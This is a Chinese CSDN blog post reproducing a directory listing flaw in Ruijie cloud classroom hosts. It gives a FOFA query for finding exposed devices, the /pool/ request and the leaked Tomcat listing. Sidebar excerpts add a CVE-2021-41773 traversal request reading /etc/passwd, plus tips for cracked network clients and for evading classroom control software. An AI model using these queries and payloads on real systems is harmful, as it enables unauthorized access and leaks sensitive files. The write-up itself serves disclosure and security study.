锐捷 云课堂主机 pool 目录遍历漏洞

最新推荐文章于 2024-07-06 11:48:34 发布
最新推荐文章于 2024-07-06 11:48:34 发布
阅读量2.8k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35938621/article/details/124055122
版权

漏洞描述

i ⭐锐捷云课堂主机存在目录遍历漏洞,通过访问get请求/pool/,即可读取目录.导致敏感信息泄露.

漏洞影响

s ✅锐捷云课堂

空间测绘

d ⭕FOFA:title="Ruijie" && "云课堂主机"

漏洞复现

  • ✅访问 http://1.1.1.1/pool目录遍历
Directory Listing For /

Filename	Size	Last Modified
   Packages.gz	490.8 kb	Fri, 26 May 2017 00:22:32 GMT
   extra/	 	Fri, 26 May 2017 00:22:33 GMT
   main/	 	Fri, 26 May 2017 00:22:33 GMT
   
Apache Tomcat/6.0.24

image-20220409082939453

个人博客

孤桜懶契:https://gylq.gitee.io/time

孤桜懶契
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
破解版锐捷
11-01
32位系统使用 ******说明:软件部分文件经过修改、替换,不是原版的!logo改为理工了****** 使用方法: ---------------------------------------------------------------------------------------------------------- 在32位的WinXP系统中,可以直接运行"锐捷认证.exe",也可以解压文件后运行“安装.bat”, 然后运行"MentoHUST.exe"即可认证上网! ---------------------------------------------------------------------------------------------------------- 在Win7系统中,解压"锐捷认证.exe"到某个目录,如“锐捷认证”; 以管理员身份运行"安装.bat",应该可以解决"锐捷认证上网"的问题! ---------------------------------------------------------------------------------------------------------- 卸载:退出程序,然后运行“卸载.bat”即可卸载服务,最后手动删除文件。。。 若无法认证,请安装最新版的"WinPcap". WinPcap更新地址:http://www.winpcap.org/install/default.htm 若提示缺少文件,请自己下载相关文件放到指定位置。。。 原作者软件更新链接:http://lewuya.ys168.com/
Directory Listing For解决方法-tomcat启动,首页报错
dgjhvgh的博客
07-11 1580
https://blog.csdn.net/u013967958/article/details/52767924
锐捷课堂主机 默认口令 目录遍历漏洞
自强不息
10-28 424
各家兴便是天下大同
上课解除教师机控制(红蜘蛛)超详细
热门推荐
controllerha的博客
11-30 8万+
控制软件为软件红蜘蛛 在教室上课的时候,可能会碰到敲键盘敲得正爽却突然被老师控制的气死人情况,那我们就直接解除自己慢慢嗨吧 软件: 解除方法: 1.打开控制面板 2.选择系统和安全 3.进入防火墙并打开 4.点击高级设置进入,并右键新建入站规则,选择程序点击下一步
华硕老毛子(Padavan)——锐捷6.41,静态ip,学生破解过程分享,非专业仅供参考,啰嗦的一批,有耐心能看懂
Hj127666的博客
03-12 1万+
@华硕老毛子(Padavan)——锐捷6.41,学生破解过程分享,非专业仅供参考 参考多数文章,内容仅供学习,侵删。 本文章废话偏多,而且就是为自己周围人分享使用,不喜勿喷 该教程不同学校管控力度不同,监管也不同 学习提供的是静态ip地址 —————————————分割线————————————— 1.锐捷版本号6.41,客户端如下,其他的客户端内容也差不多。 2.某多或者某鱼搜索,老毛子or老毛子路由器 搜索结果基本上都是 斐讯K2 ,这些店铺都有刷好的固件供你使用 ,价格在40-70块钱。(我懒,
[漏洞检查项] Directory Listing | 目录浏览
m0_46101480的博客
12-06 419
在任何情况下,Web 根目录中的任何敏感资源都应该受到适当的访问控制,并且不应该被碰巧知道或猜测URL 的未经授权的一方访问。即使禁用了目录列表,攻击者也可以使用自动化工具猜测敏感文件的位置。Web 服务器可以配置为自动列出没有索引页的目录的内容。它特别增加了目录中用户无法访问的敏感文件的暴露,例如临时文件和崩溃转储。当Web 服务某一个目录下没有主页的时候,会将目录下所有的内容列出来,类似于ls 命令。通常没有任何充分的理由提供目录列表,禁用它们可能会给攻击者的路径设置额外的障碍。
锐捷It综合管理平台账号密码忘记解决方法
qq_31146399的博客
12-16 3982
密码忘记登录不了,如上图所示。 解决方法: 如下密码重置软件复制到rill安装服务器,点击运行。 IP地址讲述 如果是复制到riil安装服务器可以不用修改Ip,默认127.0.01. 如果远程重置密码需要修改成riil安装服务器IP地址。 点击连接Mysql,提示信息显示连接成功,之后,点击admin密码重置即可,密码修改成默认密码。 ...
锐捷课堂
12-17
锐捷课堂的详细介绍以及入门知识,方便大家查阅。
锐捷课堂解决方案部署运维文档集锦.chm
04-15
锐捷课堂解决方案部署运维文档集锦
锐捷智慧课堂实施部署一本通(V1.01).chm
04-19
锐捷智慧课堂实施部署一本通
锐捷认证桌面工程师(RSE-CDA )PPT.rar
04-16
锐捷认证桌面工程师(RSE-CDA)是针对桌面技术的专业培训课程,旨在培养具备桌面部署、管理和维护能力的技术人才。本压缩包文件包含了一系列与该认证相关的PPT教程,涵盖了从基础到高级的多个方面。下面将详细...
锐捷桌面CDARSE-CDA.docx
04-24
锐捷桌面CDARSE-CDA.docx 锐捷桌面CDA 是一种计算技术,主要应用于教育领域,...* 课堂标准版主机配置的三种网络模式是桌面校园网-终端校园网、桌面校园网-终端私有网和桌面私有网-终端私有网。
如何登录锐捷设备(桌面篇)
rjxxer的博客
11-10 4117
网络学习,知识分享。
目录遍历攻击详解
metheir的博客
01-08 8283
对于一个安全的Web服务器来说,对Web内容进行恰当的访问控制是极为关键的。目录遍历是Http所存在的一个安全漏洞,它使得攻击者能够访问受限制的目录,并在Web服务器的根目录以外执行命令。   Web服务器主要提供两个级别的安全机制:   访问控制列表——就是我们常说的ACL   根目录访问   访问控制列表是用于授权过程的,它是一个Web服务器的管理员用来说明什么用户或用
路径遍历与文件读取漏洞以及其修复方案
pygain的博客
10-17 3万+
一些网站的业务需求,可能提供文件查看或下载功能,如果对用户查看或下载的文件不做限制,那么用户就能够查看和下载任意2文件,可以使源代码文件、敏感文件等
目录遍历攻击
大菜鸟的博客
02-11 2万+
原文地址:https://en.wikipedia.org/wiki/Directory_traversal_attack【译】目录遍历攻击一次目录遍历攻击(directory traversal attack)通常利用了“服务器安全认证缺失”或者“用户提供输入的文件处理操作”,使得服务器端文件操作接口执行了带有“遍历父文件目录”意图的恶意输入字符。 这种攻击的目的通常是利用服务器相关(存在安全
CVE-2021-41773目录遍历(文件穿越)漏洞复现
qq_59826623的博客
10-11 1701
CVE-202141773目录遍历(文件穿越)漏洞 Linux环境下 进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。 等待文件下载…… 安装完成后重启服务 访问本地的8080端口 打开Burpsuite,构造get参数 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 转换为post参数 修改命令为POST /cgi-bin/.%2e/%2e
漏洞目录遍历漏洞
angry_program的博客
01-10 2392
目录遍历漏洞 目录遍历, 也叫路径遍历,由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件 (可以是web根目录以外的文件),甚至可以执行系统命令。 原理 程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。...
【ARMv8/v9 GIC 系列 5.4 -- 中断分组与安全及优先级配置】
最新发布
CodingCos的博客
07-06 48
在这两种状态中,都可以执行用户级别和特权级别的代码,但是在非安全状态下执行的软件只能通过对安全监视器(Secure Monitor)的系统调用来访问安全状态。GIC(通用中断控制器)架构支持与这两种安全状态相关的中断的路由和处理。在多处理器系统中,系统内的一个或多个处理元素(PEs)可能支持仅在安全状态下可用的资源访问,或仅在非安全状态下可用的资源访问。这种灵活的配置允许系统根据需要调整中断处理的优先级分组,使得系统能够更有效地响应不同优先级的中断请求。标志指示GIC是否配置为支持ARMv8-A安全模型。
课堂增强版计算机机房解决方案v1.0.pptx
05-12
课堂增强版计算机机房解决方案v1.0.pptx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤桜懶契

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值